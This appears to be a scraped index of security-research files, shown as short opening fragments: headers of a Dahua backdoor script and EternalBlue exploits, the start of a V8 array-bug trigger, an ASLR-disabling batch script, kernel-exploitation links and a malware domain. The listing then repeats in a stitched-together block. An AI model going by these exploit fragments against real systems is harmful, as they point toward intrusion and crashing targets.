huyna

## dahua-backdoor.py
#!/usr/bin/python2.7
#
# Dahua backdoor Generation 2 and 3
# Author: bashis <mcw noemail eu> March 2017
#
# Credentials: No credentials needed (Anonymous)
#Jacked from git history
#

import string

## eternalblue8_exploit.py
#!/usr/bin/python
from impacket import smb
from struct import pack
import os
import sys
import socket

'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)

## eternalblue_exploit.py
#!/usr/bin/python
from impacket import smb
from struct import pack
import os
import sys
import socket

'''
EternalBlue exploit by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)

## js_sandbox.js
with (true) {
  // f() will allocate a buggy JSArray. The length is set to 24 but the capacity is only 16.
  // take a look at JSCreateLowering::ReduceJSCreateArray to see why this is happening
  function f(){
    var x = 8;
    var y = 0xffffffff;
    var ind = x & y;
    x = 16;
    y = 0xffffffff;
    var ind2 = ind + (x&y);

## Change Post-Mortem Debugger
Click "Start" and "Run."
Type "regedit" without the quotation marks to open the registry editor.
Expand "HKEY_LOCAL_MACHINE" and go to "Software." Click on "Microsoft, "WindowsNT," "Current Version" and "AeDebug."
Double-click the registry key "Debugger" on the right-window pane.
Change the entry to "drwtsn32 -p %ld -e %ld -g" -- including the quotation marks -- to change the post-mortem debugger back to its default.
Click "OK" and close the registry editor.

## LicenseEngine.cs
public bool VerifyLicense(string licenseKey, string email)
	{
		if (string.IsNullOrEmpty(licenseKey) || string.IsNullOrEmpty(email))
		{
			return false;
		}
		try
		{
			this.License = this.Decrypt(licenseKey);
			this.LicenseProcessed = true;

## slab slub
http://phrack.org/issues/64/6.html
https://loccs.sjtu.edu.cn/~romangol/download/papers/gossip_ccs2015.pdf
http://resources.infosecinstitute.com/exploiting-linux-kernel-heap-corruptions-slub-allocator/
http://www.slideshare.net/nullthreat/fund-linux-priv-esc-wprotections
http://www.slideshare.net/sciosecurity/linux-kernel-exploitation
http://events.linuxfoundation.org/sites/events/files/slides/slaballocators.pdf
https://github.com/xairy/kaslr-bypass-via-prefetch
http://www.jikos.cz/jikos/Kmalloc_Internals.html
https://github.com/Fuzion24/AndroidKernelExploitationPlayground
http://dcjtech.info/topic/linux-kernel-slab-allocators/

## DexGuardDecoder.java
import jeb.api.IScript;
import jeb.api.JebInstance;
import jeb.api.ast.*;
import jeb.api.ast.Class;
import jeb.api.dex.*;
import jeb.api.ui.JavaView;
import jeb.api.ui.View;

import java.util.Arrays;
import java.util.HashMap;

## DisableASLR-win10.bat
@ECHO OFF
SETLOCAL

ECHO ASLR Enable / Diable Batch Script - Please run as admin
set /p Choice=Want to Enable or Disable ASLR? (e or d):%=%

if "%Choice%"=="e" goto :ENABLE
if "%Choice%"=="d" goto :DISABLE

:ENABLE

## mal-domain
az667904.vo.msecnd.net
	#!/usr/bin/python2.7
	#
	# Dahua backdoor Generation 2 and 3
	# Author: bashis <mcw noemail eu> March 2017
	#
	# Credentials: No credentials needed (Anonymous)
	#Jacked from git history
	#

	import string
	#!/usr/bin/python
	from impacket import smb
	from struct import pack
	import os
	import sys
	import socket

	'''
	EternalBlue exploit for Windows 8 and 2012 by sleepya
	The exploit might FAIL and CRASH a target system (depended on what is overwritten)
	with (true) {
	// f() will allocate a buggy JSArray. The length is set to 24 but the capacity is only 16.
	// take a look at JSCreateLowering::ReduceJSCreateArray to see why this is happening
	function f(){
	var x = 8;
	var y = 0xffffffff;
	var ind = x & y;
	x = 16;
	y = 0xffffffff;
	var ind2 = ind + (x&y);
	Click "Start" and "Run."
	Type "regedit" without the quotation marks to open the registry editor.
	Expand "HKEY_LOCAL_MACHINE" and go to "Software." Click on "Microsoft, "WindowsNT," "Current Version" and "AeDebug."
	Double-click the registry key "Debugger" on the right-window pane.
	Change the entry to "drwtsn32 -p %ld -e %ld -g" -- including the quotation marks -- to change the post-mortem debugger back to its default.
	Click "OK" and close the registry editor.
	public bool VerifyLicense(string licenseKey, string email)
	{
	if (string.IsNullOrEmpty(licenseKey) \|\| string.IsNullOrEmpty(email))
	{
	return false;
	}
	try
	{
	this.License = this.Decrypt(licenseKey);
	this.LicenseProcessed = true;
	http://phrack.org/issues/64/6.html
	https://loccs.sjtu.edu.cn/~romangol/download/papers/gossip_ccs2015.pdf
	http://resources.infosecinstitute.com/exploiting-linux-kernel-heap-corruptions-slub-allocator/
	http://www.slideshare.net/nullthreat/fund-linux-priv-esc-wprotections
	http://www.slideshare.net/sciosecurity/linux-kernel-exploitation
	http://events.linuxfoundation.org/sites/events/files/slides/slaballocators.pdf
	https://github.com/xairy/kaslr-bypass-via-prefetch
	http://www.jikos.cz/jikos/Kmalloc_Internals.html
	https://github.com/Fuzion24/AndroidKernelExploitationPlayground
	http://dcjtech.info/topic/linux-kernel-slab-allocators/
	import jeb.api.IScript;
	import jeb.api.JebInstance;
	import jeb.api.ast.*;
	import jeb.api.ast.Class;
	import jeb.api.dex.*;
	import jeb.api.ui.JavaView;
	import jeb.api.ui.View;

	import java.util.Arrays;
	import java.util.HashMap;
	@ECHO OFF
	SETLOCAL

	ECHO ASLR Enable / Diable Batch Script - Please run as admin
	set /p Choice=Want to Enable or Disable ASLR? (e or d):%=%

	if "%Choice%"=="e" goto :ENABLE
	if "%Choice%"=="d" goto :DISABLE

	:ENABLE